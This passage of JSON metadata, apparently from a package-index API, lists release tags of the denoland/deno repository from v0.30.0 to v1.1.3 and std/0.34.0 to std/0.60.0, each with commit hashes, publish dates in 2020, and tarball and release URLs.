shed_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.